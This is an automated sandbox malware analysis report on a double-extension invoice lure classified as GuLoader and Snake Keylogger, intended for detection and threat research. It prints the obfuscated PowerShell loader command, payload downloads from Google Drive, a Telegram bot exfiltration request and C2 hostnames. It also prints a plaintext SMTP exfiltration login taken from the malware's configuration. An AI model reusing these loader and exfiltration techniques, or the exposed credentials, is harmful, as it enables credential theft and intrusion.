Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INV-0542.pdf.exe

Overview

General Information

Sample name:INV-0542.pdf.exe
Analysis ID:1562595
MD5:fa02056b1a21f75efabdda81219fb7db
SHA1:3e8dd711bfef09d2db54af75476765d85693c756
SHA256:23be2a96f4c15306083c180774452e11f42837e297627cd33ad5a9708953cd4c
Tags:exeuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Sigma detected: Suspicious Double Extension File Execution
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Double Extension Files
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • INV-0542.pdf.exe (PID: 2164 cmdline: "C:\Users\user\Desktop\INV-0542.pdf.exe" MD5: FA02056B1A21F75EFABDDA81219FB7DB)
    • powershell.exe (PID: 5776 cmdline: "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3652 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "donan@donan.es", "Password": "Logistica07", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.2422857141.0000000009AD2000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 3652JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 3652JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\INV-0542.pdf.exe", CommandLine: "C:\Users\user\Desktop\INV-0542.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\INV-0542.pdf.exe, NewProcessName: C:\Users\user\Desktop\INV-0542.pdf.exe, OriginalFileName: C:\Users\user\Desktop\INV-0542.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\INV-0542.pdf.exe", ProcessId: 2164, ProcessName: INV-0542.pdf.exe
          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5776, TargetFilename: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3652, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49756
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5776, TargetFilename: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)" , CommandLine: "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INV-0542.pdf.exe", ParentImage: C:\Users\user\Desktop\INV-0542.pdf.exe, ParentProcessId: 2164, ParentProcessName: INV-0542.pdf.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)" , ProcessId: 5776, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T18:43:55.108638+010028033053Unknown Traffic192.168.2.549795172.67.177.134443TCP
          2024-11-25T18:44:02.858571+010028033053Unknown Traffic192.168.2.549815172.67.177.134443TCP
          2024-11-25T18:44:06.452041+010028033053Unknown Traffic192.168.2.549827172.67.177.134443TCP
          2024-11-25T18:44:09.842403+010028033053Unknown Traffic192.168.2.549834172.67.177.134443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T18:43:50.306241+010028032742Potentially Bad Traffic192.168.2.549780132.226.8.16980TCP
          2024-11-25T18:43:53.368842+010028032742Potentially Bad Traffic192.168.2.549780132.226.8.16980TCP
          2024-11-25T18:43:57.587488+010028032742Potentially Bad Traffic192.168.2.549802132.226.8.16980TCP
          2024-11-25T18:44:01.165637+010028032742Potentially Bad Traffic192.168.2.549812132.226.8.16980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T18:43:40.022486+010028032702Potentially Bad Traffic192.168.2.549756172.217.19.174443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "donan@donan.es", "Password": "Logistica07", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: INV-0542.pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49789 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49870 version: TLS 1.2
          Source: INV-0542.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2420884473.0000000008216000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2417683631.0000000006F63000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2420884473.0000000008216000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2420884473.00000000081A2000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE6347h5_2_23EE5FD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE6970h5_2_23EE6678
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE42B6h5_2_23EE3FE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEF8E0h5_2_23EEF5E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE22C6h5_2_23EE1FF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE10BEh5_2_23EE0DF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE8AE8h5_2_23EE87F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEBAB8h5_2_23EEB7C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEA2D0h5_2_23EE9FD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE3076h5_2_23EE2DA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EED2A0h5_2_23EECFA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE1E47h5_2_23EE1BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE9478h5_2_23EE9180
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE5066h5_2_23EE4D98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE7C90h5_2_23EE7998
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEEA88h5_2_23EEE790
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEAC60h5_2_23EEA968
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE0C2Eh5_2_23EE0960
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE5E16h5_2_23EE5B48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE6E38h5_2_23EE6B40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE3E26h5_2_23EE3B58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEC448h5_2_23EEC150
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE8620h5_2_23EE8328
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEF418h5_2_23EEF120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEDC30h5_2_23EED938
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE4BD7h5_2_23EE4908
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE2BE6h5_2_23EE2918
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE19DEh5_2_23EE1710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE9E08h5_2_23EE9B10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EECDD8h5_2_23EECAE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEB5F0h5_2_23EEB2F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE3996h5_2_23EE36C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEE5C0h5_2_23EEE2C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE079Eh5_2_23EE04D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE77C8h5_2_23EE74D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEA798h5_2_23EEA4A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE5986h5_2_23EE56B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE8FB0h5_2_23EE8CB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEFDA8h5_2_23EEFAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE2756h5_2_23EE2488
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEBF80h5_2_23EEBC88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE154Eh5_2_23EE1280
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE8158h5_2_23EE7E60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE4746h5_2_23EE4478
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EED768h5_2_23EED470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE9940h5_2_23EE9648
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE030Eh5_2_23EE0040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEEF50h5_2_23EEEC58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE54F6h5_2_23EE5228
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE3506h5_2_23EE3238
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEB128h5_2_23EEAE30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EE7300h5_2_23EE7008
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEE0F8h5_2_23EEDE00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23EEC910h5_2_23EEC618

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20and%20Time:%2026/11/2024%20/%2020:06:18%0D%0ACountry%20Name:%20United%20States%0D%0A[%20238576%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49780 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49812 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49802 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49795 -> 172.67.177.134:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49815 -> 172.67.177.134:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49834 -> 172.67.177.134:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49827 -> 172.67.177.134:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49756 -> 172.217.19.174:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49789 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20and%20Time:%2026/11/2024%20/%2020:06:18%0D%0ACountry%20Name:%20United%20States%0D%0A[%20238576%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 25 Nov 2024 17:44:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: powershell.exe, 00000002.00000002.2412724868.00000000029B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro=
          Source: INV-0542.pdf.exe, INV-0542.pdf.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
